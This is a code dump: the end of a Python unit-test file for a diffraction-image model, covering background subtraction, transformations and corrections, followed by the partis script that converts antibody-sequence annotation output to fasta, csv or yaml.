self.assertTrue(np.array_equal(np.flipud(original_background), flipped_background))
flipped_img_background_subtracted = np.copy(self.img_model.img_data)
self.assertTrue(np.array_equal(flipped_img_background_subtracted, flipped_img - flipped_background))
self.assertTrue(np.array_equal(np.flipud(original_img_background_subtracted),
flipped_img_background_subtracted))
self.assertEqual(np.sum(np.flipud(original_img_background_subtracted) - flipped_img_background_subtracted), 0)
self.img_model.load(os.path.join(data_path, 'image_002.tif'))
self.perform_transformations_tests()
def test_background_subtraction_with_supersampling_and_image_transformation(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.img_model.load(os.path.join(data_path, 'image_002.tif'))
self.img_model.set_supersampling(2)
self.assertEqual(self.img_model.img_data.shape, (4096, 4096))
self.perform_transformations_tests()
self.img_model.set_supersampling(3)
self.assertEqual(self.img_model.img_data.shape, (6144, 6144))
self.perform_transformations_tests()
self.img_model.load(os.path.join(data_path, 'image_002.tif'))
self.assertEqual(self.img_model.img_data.shape, (6144, 6144))
self.perform_transformations_tests()
def test_background_scaling_and_offset(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
# assure that everything is correct before
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - self.img_model._background_data))
# set scaling and see difference
self.img_model.background_scaling = 2.4
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - 2.4 * self.img_model._background_data))
# set offset and see the difference
self.img_model.background_scaling = 1.0
self.img_model.background_offset = 100.0
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - (self.img_model._background_data + 100.0)))
# use offset and scaling combined
self.img_model.background_scaling = 2.3
self.img_model.background_offset = 100.0
self.assertTrue(np.array_equal(self.img_model.img_data,
self.img_model._img_data - (2.3 * self.img_model._background_data + 100)))
def test_background_with_different_shape(self):
with self.assertRaises(BackgroundDimensionWrongException):
self.img_model.load_background(os.path.join(data_path, 'CeO2_Pilatus1M.tif'))
self.assertEqual(self.img_model._background_data, None)
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.assertTrue(self.img_model._background_data is not None)
self.img_model.load(os.path.join(data_path, 'CeO2_Pilatus1M.tif'))
self.assertEqual(self.img_model._background_data, None)
def test_absorption_correction_with_supersampling(self):
original_image = np.copy(self.img_model._img_data)
dummy_correction = DummyCorrection(self.img_model.img_data.shape, 0.6)
self.img_model.add_img_correction(dummy_correction, "Dummy 1")
self.assertAlmostEqual(np.sum(original_image / 0.6), np.sum(self.img_model.img_data), places=4)
self.img_model.set_supersampling(2)
self.img_model.img_data
def test_absorption_correction_with_different_image_sizes(self):
dummy_correction = DummyCorrection(self.img_model.img_data.shape, 0.4)
# self.img_data.set_absorption_correction(np.ones(self.img_data._img_data.shape)*0.4)
self.img_model.add_img_correction(dummy_correction, "Dummy 1")
self.assertTrue(self.img_model._img_corrections.has_items())
self.img_model.load(os.path.join(data_path, 'CeO2_Pilatus1M.tif'))
self.assertFalse(self.img_model.has_corrections())
def test_adding_several_absorption_corrections(self):
original_image = np.copy(self.img_model.img_data)
img_shape = original_image.shape
self.img_model.add_img_correction(DummyCorrection(img_shape, 0.4))
self.img_model.add_img_correction(DummyCorrection(img_shape, 3))
self.img_model.add_img_correction(DummyCorrection(img_shape, 5))
        # Note: assertTrue() with two arguments treats the second one as a failure
        # message, so the original comparisons were never actually evaluated; compare
        # the sums explicitly against the product of the added correction factors.
        self.assertTrue(np.isclose(np.sum(original_image) / (0.4 * 3 * 5), np.sum(self.img_model.img_data)))
        self.img_model.delete_img_correction(1)
        self.assertTrue(np.isclose(np.sum(original_image) / (0.4 * 5), np.sum(self.img_model.img_data)))
def test_saving_data(self):
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
filename = os.path.join(data_path, 'test.tif')
self.img_model.save(filename)
first_img_array = np.copy(self.img_model._img_data)
self.img_model.load(filename)
self.assertTrue(np.array_equal(first_img_array, self.img_model._img_data))
self.assertTrue(os.path.exists(filename))
os.remove(filename)
def test_negative_rotation(self):
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_combined_rotation(self):
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_m90()
self.img_model.rotate_img_p90()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_flip_img_horizontally(self):
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_horizontally()
self.img_model.flip_img_horizontally()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_flip_img_vertically(self):
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_vertically()
self.img_model.flip_img_vertically()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_combined_rotation_and_flipping(self):
self.img_model.flip_img_vertically()
self.img_model.flip_img_horizontally()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_p90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.flip_img_horizontally()
transformed_data = self.img_model.img_data
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
self.assertTrue(np.array_equal(self.img_model.img_data, transformed_data))
def test_reset_img_transformation(self):
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_m90()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.rotate_img_p90()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_horizontally()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_vertically()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
pre_transformed_data = self.img_model.img_data
self.img_model.flip_img_vertically()
self.img_model.flip_img_horizontally()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_p90()
self.img_model.rotate_img_m90()
self.img_model.rotate_img_m90()
self.img_model.flip_img_horizontally()
self.img_model.reset_transformations()
self.assertTrue(np.array_equal(self.img_model.img_data, pre_transformed_data))
def test_loading_a_tagged_tif_file_and_retrieving_info_string(self):
self.img_model.load(os.path.join(data_path, "attrib.tif"))
self.assertIn("areaDetector", self.img_model.file_info)
def test_loading_spe_file(self):
self.img_model.load(os.path.join(spe_path, 'CeO2_PI_CCD_Mo.SPE'))
self.assertEqual(self.img_model.img_data.shape, (1042, 1042))
def test_summing_files(self):
data1 = np.copy(self.img_model._img_data).astype(np.uint32)
self.img_model.add(os.path.join(data_path, 'image_001.tif'))
self.assertTrue(np.array_equal(2 * data1, self.img_model._img_data))
def test_summing_rotated(self):
self.img_model.rotate_img_m90()
data1 = np.copy(self.img_model._img_data).astype(np.uint32)
self.img_model.add(os.path.join(data_path, 'image_001.tif'))
self.assertTrue(np.array_equal(2 * data1, self.img_model._img_data))
if __name__ == '__main__':
unittest.main()
| erangre/Dioptas | dioptas/tests/unit_tests/test_ImgModel.py | Python | gpl-3.0 | 14,066 |
#!/usr/bin/env python
import sys
import csv
csv.field_size_limit(sys.maxsize) # make sure we can write very large csv fields
import os
import argparse
import colored_traceback.always
# if you move this script, you'll need to change this method of getting the imports
partis_dir = os.path.dirname(os.path.realpath(__file__)).replace('/bin', '')
sys.path.insert(1, partis_dir + '/python')
import utils
import glutils
# ----------------------------------------------------------------------------------------
def count_plot(tglfo, tlist, plotdir, paired_loci=None):
if len(tlist) == 0:
return
if args.plot_tree_mut_stats:
import plotting
plotting.plot_tree_mut_stats(plotdir, tlist, args.is_simu, only_leaves=args.only_plot_leaves, treefname=args.treefname)
return
if args.only_count_correlations:
from corrcounter import CorrCounter
ccounter = CorrCounter(paired_loci=paired_loci)
for line in tlist:
l_info = None
if paired_loci is not None:
line, l_info = line
ccounter.increment(line, l_info=l_info)
ccounter.plot(plotdir + '/correlations', only_csv=args.only_csv_plots, debug=args.debug)
return
if args.simfname is not None:
simglfo, true_antn_list, _ = utils.read_output(args.simfname)
true_antn_dict = {}
for true_line in true_antn_list:
for iseq, uid in enumerate(true_line['unique_ids']):
true_antn_dict[uid] = utils.synthesize_single_seq_line(true_line, iseq)
# true_antn_dict = utils.get_annotation_dict(true_antn_list)
from performanceplotter import PerformancePlotter
perfplotter = PerformancePlotter('hmm')
n_failed = 0
for line in tlist:
if line['invalid']:
n_failed += 1
continue
for iseq, uid in enumerate(line['unique_ids']): # NOTE this counts rearrangement-level parameters once for every mature sequence, which is inconsistent with the pcounters... but I think might make more sense here?
_ = perfplotter.evaluate(true_antn_dict[uid], utils.synthesize_single_seq_line(line, iseq), simglfo=simglfo)
perfplotter.plot(args.plotdir, only_csv=args.only_csv_plots)
if n_failed > 0:
print ' %s %d / %d failed queries' % (utils.color('yellow', 'warning'), n_failed, len([u for l in tlist for u in l['unique_ids']]))
if args.only_plot_performance:
return
assert not args.paired # only handled for correlation counting atm
from parametercounter import ParameterCounter
setattr(args, 'region_end_exclusions', {r : [0 for e in ['5p', '3p']] for r in utils.regions}) # hackity hackity hackity
pcounter = ParameterCounter(tglfo, args) # NOTE doesn't count correlations by default
for line in tlist:
pcounter.increment(line)
pcounter.plot(plotdir, only_csv=args.only_csv_plots, only_overall=args.only_overall_plots) #, make_per_base_plots=True) , make_per_base_plots=True
# ----------------------------------------------------------------------------------------
helpstr = """
Extract sequences from a partis output file and write them to a fasta, csv, or tsv file, optionally with a limited amount of extra information for each sequence.
For details of partis output files, see the manual.
To view the partitions and annotations in a partis output file, use the partis \'view-output\' action.
Example usage:
./bin/parse-output.py test/reference-results/partition-new-simu.yaml out.fa
"""
class MultiplyInheritedFormatter(argparse.RawTextHelpFormatter, argparse.ArgumentDefaultsHelpFormatter):
pass
formatter_class = MultiplyInheritedFormatter
parser = argparse.ArgumentParser(formatter_class=MultiplyInheritedFormatter, description=helpstr)
parser.add_argument('infile', help='partis output file from which to read input')
parser.add_argument('outfile', help='file to which to write output extracted from <infile> (fasta or csv/tsv)')
parser.add_argument('--paired', action='store_true', help='if set, <infile> should be a paired output dir, rather than a single file')
parser.add_argument('--extra-columns', help='colon-separated list of additional partis output columns (beyond sequences), to write to the output file. If writing to a fasta file, the column values are appended after the sequence name, separated by --fasta-info-separator. If writing to csv/tsv, they\'re written as proper, labeled columns.')
parser.add_argument('--partition-index', type=int, help='if set, use the partition at this index in the cluster path, rather than the default of using the best partition')
parser.add_argument('--seed-unique-id', help='if set, take sequences only from the cluster containing this seed sequence, rather than the default of taking all sequences from all clusters')
parser.add_argument('--cluster-index', type=int, help='if set, take sequences only from the cluster at this index in the partition, rather than the default of taking all sequences from all clusters. This index is with respect to the cluster order found in the file (which, in contrast to plots made by --plotdir, is *not* sorted by size)')
parser.add_argument('--indel-reversed-seqs', action='store_true', help='if set, take sequences that have had any shm indels "reversed" (i.e. insertions are reversed, and deletions are replaced with the germline bases) rather than the default of using sequences from the original input file. Indel-reversed sequences can be convenient because they are by definition the same length as and aligned to the naive sequence.')
parser.add_argument('--glfo-dir', help='Directory with germline info. Only necessary for old-style csv output files. Equivalent to a parameter dir with \'/hmm/germline-sets\' appended.')
parser.add_argument('--template-glfo-dir', help='use this glfo dir as a template when reading --glfo-dir (only used for airr input atm)')
parser.add_argument('--locus', default='igh', help='only used for old-style csv output files')
parser.add_argument('--plotdir', help='if set, plot annotation parameters from infile to --plotdir and exit (you still have to set outfile, sorry, since it\'s nice having it be a positional arg, but it doesn\'t get used for this). To add e.g. per-gene-per-position plots comment/uncomment args in the call below.')
parser.add_argument('--only-count-correlations', action='store_true', help='')
parser.add_argument('--only-plot-performance', action='store_true', help='')
parser.add_argument('--fasta-info-separator', default=' ', help='character used to separate the extra info fields appended after each fasta sequence name')
parser.add_argument('--debug', type=int, default=0)
parser.add_argument('--airr-input', action='store_true', help='read input in AIRR tsv format, and if output file suffix is .yaml write partis output.')
parser.add_argument('--airr-output', action='store_true', help='write output in AIRR tsv format')
parser.add_argument('--skip-other-locus', action='store_true', help='if --airr-output is set, this tells us to skip lines from the other locus')
parser.add_argument('--skip-columns', help='don\'t write these columns to output (atm only implemented for airr output, since we need to remove the clone_id column so scoper doesn\'t crash)')
parser.add_argument('--simfname', help='simulation file corresponding to input file (i.e. presumably <infile> is inference that was performed on --simfname)')
parser.add_argument('--only-csv-plots', action='store_true', help='only write csv versions of plots (not svg), which is a lot faster')
parser.add_argument('--only-make-plots', action='store_true', help='if --plotdir is set, set this to only do plotting, i.e. don\'t do the usual/default file reading/conversion')
parser.add_argument('--plot-tree-mut-stats', action='store_true', help='plot tree mutation stats and exit')
parser.add_argument('--only-plot-leaves', action='store_true', help='only affects --plot-tree-mut-stats')
parser.add_argument('--is-simu', action='store_true', help='only affects --plot-tree-mut-stats')
parser.add_argument('--only-overall-plots', action='store_true', help='TODO')
parser.add_argument('--treefname', help='only affects --plot-tree-mut-stats')
if 'extract-fasta.py' in sys.argv[0]: # if they're trying to run this old script, which is now just a link to this one, print a warning and rejigger the arguments so it still works
print ' note: running deprecated script %s, which currently is just a link pointing to %s' % (os.path.basename(sys.argv[0]), os.path.basename(os.path.realpath( __file__)))
print ' note: transferring deprecated arguments --input-file and --fasta-output-file to the first two positional arguments (this will continue to work, you only need to change things if you want this warning to go away)'
utils.insert_in_arglist(sys.argv, [utils.get_val_from_arglist(sys.argv, '--input-file'), utils.get_val_from_arglist(sys.argv, '--fasta-output-file')], sys.argv[0])
utils.remove_from_arglist(sys.argv, '--input-file', has_arg=True)
utils.remove_from_arglist(sys.argv, '--fasta-output-file', has_arg=True)
args = parser.parse_args()
args.extra_columns = utils.get_arg_list(args.extra_columns)
assert utils.getsuffix(args.outfile) in ['.csv', '.tsv', '.fa', '.fasta'] or args.airr_input and utils.getsuffix(args.outfile) == '.yaml'
default_glfo_dir = partis_dir + '/data/germlines/human'
if utils.getsuffix(args.infile) in ['.csv', '.tsv'] and args.glfo_dir is None:
print ' note: reading csv/tsv format without germline info, so need to get germline info from a separate directory; --glfo-dir was not set, so using default %s. If it doesn\'t crash, it\'s probably ok.' % default_glfo_dir
args.glfo_dir = default_glfo_dir
# ----------------------------------------------------------------------------------------
# read input
if args.paired:
import paircluster
def getofn(ltmp, lpair=None):
ofn = paircluster.paired_fn(args.infile, ltmp, lpair=lpair, suffix='.yaml')
if not os.path.exists(ofn): # first look for simy file (just e.g. igh.yaml), if it's not there look for the partition output file
ofn = paircluster.paired_fn(args.infile, ltmp, lpair=lpair, actstr='partition', suffix='.yaml')
return ofn
lp_infos = paircluster.read_lpair_output_files(utils.locus_pairs['ig'], getofn)
else:
if args.airr_input:
glfo, glfd = None, args.glfo_dir
if args.template_glfo_dir is not None: # NOTE only handled for airr input at the moment, cause that's what i need it for right now
glfo = glutils.read_glfo(args.glfo_dir, args.locus, template_glfo=glutils.read_glfo(args.template_glfo_dir, args.locus))
# glutils.write_glfo(args.glfo_dir + '-parsed', glfo, debug=True)
glfd = None
glfo, annotation_list, cpath = utils.read_airr_output(args.infile, locus=args.locus, glfo=glfo, glfo_dir=glfd, skip_other_locus=args.skip_other_locus)
else:
glfo, annotation_list, cpath = utils.read_output(args.infile, glfo_dir=args.glfo_dir, locus=args.locus)
# plot
if args.plotdir is not None:
if args.paired:
for lpair in utils.locus_pairs['ig']:
if lp_infos[tuple(lpair)]['glfos'] is None:
continue
for ltmp in lpair:
count_plot(lp_infos[tuple(lpair)]['glfos'][ltmp], lp_infos[tuple(lpair)]['antn_lists'][ltmp], '%s/%s/%s'%(args.plotdir, '+'.join(lpair), ltmp))
antn_pairs = paircluster.find_cluster_pairs(lp_infos, lpair) #, debug=True)
count_plot(None, antn_pairs, '%s/%s'%(args.plotdir, '+'.join(lpair)), paired_loci=[l['loci'][0] for l in antn_pairs[0]])
else:
count_plot(glfo, annotation_list, args.plotdir)
if args.only_make_plots:
sys.exit(0)
assert not args.paired # only handled for plotting above atm
# restrict to certain partitions/clusters
if cpath is None or cpath.i_best is None:
clusters_to_use = [l['unique_ids'] for l in annotation_list]
print ' no cluster path in input file, so just using all %d sequences (in %d clusters) in annotations' % (sum(len(c) for c in clusters_to_use), len(clusters_to_use))
else:
ipartition = cpath.i_best if args.partition_index is None else args.partition_index
print ' found %d clusters in %s' % (len(cpath.partitions[ipartition]), 'best partition' if args.partition_index is None else 'partition at index %d (of %d)' % (ipartition, len(cpath.partitions)))
if args.cluster_index is None:
clusters_to_use = cpath.partitions[ipartition]
print ' taking all %d clusters' % len(clusters_to_use)
else:
clusters_to_use = [cpath.partitions[ipartition][args.cluster_index]]
print ' taking cluster at index %d with size %d' % (args.cluster_index, len(clusters_to_use[0]))
if args.seed_unique_id is not None:
    clusters_to_use = [c for c in clusters_to_use if args.seed_unique_id in c]  # NOTE can result in more than one cluster with the seed sequence (e.g. if this file contains intermediate annotations from seed partitioning)
print ' removing clusters not containing sequence \'%s\' (leaving %d)' % (args.seed_unique_id, len(clusters_to_use))
if not os.path.exists(os.path.dirname(os.path.abspath(args.outfile))):
os.makedirs(os.path.dirname(os.path.abspath(args.outfile)))
if args.airr_output:
print ' writing %d sequences to %s' % (len(annotation_list), args.outfile)
utils.write_airr_output(args.outfile, annotation_list, cpath=cpath, extra_columns=args.extra_columns, skip_columns=args.skip_columns)
sys.exit(0)
# condense partis info into <seqfos> for fasta/csv output
seqfos = []
annotations = {':'.join(adict['unique_ids']) : adict for adict in annotation_list} # collect the annotations in a dictionary so they're easier to access
for cluster in clusters_to_use:
if ':'.join(cluster) not in annotations:
print ' %s cluster with size %d not in annotations, so skipping it' % (utils.color('red', 'warning'), len(cluster))
continue
cluster_annotation = annotations[':'.join(cluster)]
newfos = [{'name' : u, 'seq' : s} for u, s in zip(cluster_annotation['unique_ids'], cluster_annotation['seqs' if args.indel_reversed_seqs else 'input_seqs'])]
if args.extra_columns is not None:
for ecol in args.extra_columns:
if ecol not in cluster_annotation:
utils.add_extra_column(ecol, cluster_annotation, cluster_annotation)
# raise Exception('column \'%s\' not found in annotations' % ecol)
for iseq in range(len(newfos)):
ival = cluster_annotation[ecol]
if ecol in utils.linekeys['per_seq']:
ival = ival[iseq]
newfos[iseq][ecol] = ival
seqfos += newfos
# write output
print ' writing %d sequences to %s' % (len(seqfos), args.outfile)
with open(args.outfile, 'w') as ofile:
if utils.getsuffix(args.outfile) in ['.csv', '.tsv']:
writer = csv.DictWriter(ofile, seqfos[0].keys(), delimiter=',' if utils.getsuffix(args.outfile)=='.csv' else '\t')
writer.writeheader()
for sfo in seqfos:
writer.writerow(sfo)
elif utils.getsuffix(args.outfile) in ['.fa', '.fasta']:
for sfo in seqfos:
estr = ''
if args.extra_columns is not None:
estr = args.fasta_info_separator
estr += args.fasta_info_separator.join(str(sfo[c]) for c in args.extra_columns)
ofile.write('>%s%s\n%s\n' % (sfo['name'], estr, sfo['seq']))
elif utils.getsuffix(args.outfile) == '.yaml':
true_partition = None
if args.simfname is not None:
_, _, true_cpath = utils.read_output(args.simfname, skip_annotations=True)
true_partition = true_cpath.best()
plines = cpath.get_partition_lines(true_partition=true_partition, calc_missing_values='none' if true_partition is None else 'best')
utils.write_annotations(args.outfile, glfo, annotation_list, utils.add_lists(utils.annotation_headers, args.extra_columns), partition_lines=plines)
else:
assert False
| psathyrella/partis | bin/parse-output.py | Python | gpl-3.0 | 16,139 |